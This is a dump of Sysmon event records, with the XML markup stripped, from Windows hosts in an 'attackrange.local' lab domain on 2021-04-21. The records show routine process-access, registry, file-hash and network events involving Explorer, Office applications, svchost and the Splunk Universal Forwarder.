Office\root\Office16\EXCEL.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001530355Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:10.154{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530354Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:10.154{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15Binary Data 10341000x80000000000000001530353Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:10.154{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-6063-6080-A15D-00000000BB01}3120C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530370Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:11.924{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530369Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:11.924{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CAD6C5C4C559707B6D0E2F9F8B291AC,SHA256=AA65E68A359E6E29F3777BB113E772EF56C5A24EABD13464E3455094AF711478falsefalse - insufficient disk space 354300x80000000000000001530368Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.240{00000000-0000-0000-0000-000000000000}388<unknown process>-tcptruefalse10.0.1.15win-host-5.attackrange.local64680-false185.199.111.133cdn-185-199-111-133.github.com443https 13241300x80000000000000001530367Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:11.338{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x80000000000000001530366Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:11.338{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 13241300x80000000000000001530365Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:11.338{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBABinary Data 13241300x80000000000000001530364Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:11.338{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15Binary Data 11241100x80000000000000001530363Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:11.137{21761711-83AE-607D-1100-00000000BB01}968C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-04-19 13:21:46.711 23542300x80000000000000001530362Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:11.137{21761711-83AE-607D-1100-00000000BB01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=185A3B37BBF711196A22A43FF781BB41,SHA256=2074BDF0E0719413EB25BA125C987FAB96269D18433277A8EA3F42CC1C065B2Afalsefalse - insufficient disk space 10341000x80000000000000001061019Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:11.043{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061018Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:11.043{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061017Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:11.000{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EE3F6955AA8D3CB427F12E8CDF711DE,SHA256=84987C98F00E8BB5B7364B968DCAAE6E3FD06B14D069B5A42802A46801865CE7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001530383Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:12.979{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530382Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:12.979{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B8E08D0FC288798311E9D85F8FEF836,SHA256=40B1E8884462BD189110AD537698DDA97B5A84F421A7A0C9E9CD01EF15527840falsefalse - insufficient disk space 11241100x80000000000000001530381Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:12.741{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml2021-04-19 13:22:46.774 23542300x80000000000000001530380Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:12.741{21761711-842A-607D-9700-00000000BB01}3716NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=E21F5C2105D3482548EE1DCEAA8E3F18,SHA256=A62C5AB5FD16B72845400EE5338C4D5D0AC27884510730AA80A58BEA4A9B021Efalsefalse - insufficient disk space 13241300x80000000000000001530379Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:12.741{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000011069A\VirtualDesktopBinary Data 12241200x80000000000000001530378Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:12.741{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000011069A 13241300x80000000000000001530377Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:12.679{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation\LastOrientationDWORD (0x00000000) 12241200x80000000000000001530376Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:12.679{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXEHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AutoRotation 10341000x80000000000000001530375Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:12.679{21761711-84C9-607D-F200-00000000BB01}37844604C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001530374Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:12.679{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\16.0\Common\Roaming\RoamingLastWriteTimeWordBinary Data 13241300x80000000000000001530373Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 17:30:12.679{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Office\16.0\Common\Roaming\RoamingLastSyncTimeWordBinary Data 10341000x80000000000000001530372Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:12.663{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001530371Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:12.663{21761711-84C9-607D-F200-00000000BB01}37844996C:\Windows\Explorer.EXE{21761711-4F27-6080-8D5B-00000000BB01}5624C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061080Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.555{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-6124-6080-965C-00000000BA01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061079Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.553{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061078Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.553{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061077Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.553{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061076Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.553{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061075Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.552{761B69BB-818A-607D-0500-00000000BA01}408532C:\Windows\system32\csrss.exe{761B69BB-6124-6080-965C-00000000BA01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001061074Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.552{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-6124-6080-965C-00000000BA01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001061073Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.552{761B69BB-6124-6080-965C-00000000BA01}6324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001061072Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.550{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D722DAF61B86214D441B0B369E2F8FD,SHA256=6C89454B2245697C57D0C2B7A1F79C7B6CBB70252A8C833BA353BC7CB56D8277,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061071Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061070Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061069Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061068Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061067Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061066Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:12.357{761B69BB-818C-607D-0D00-00000000BA01}904924C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061065Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 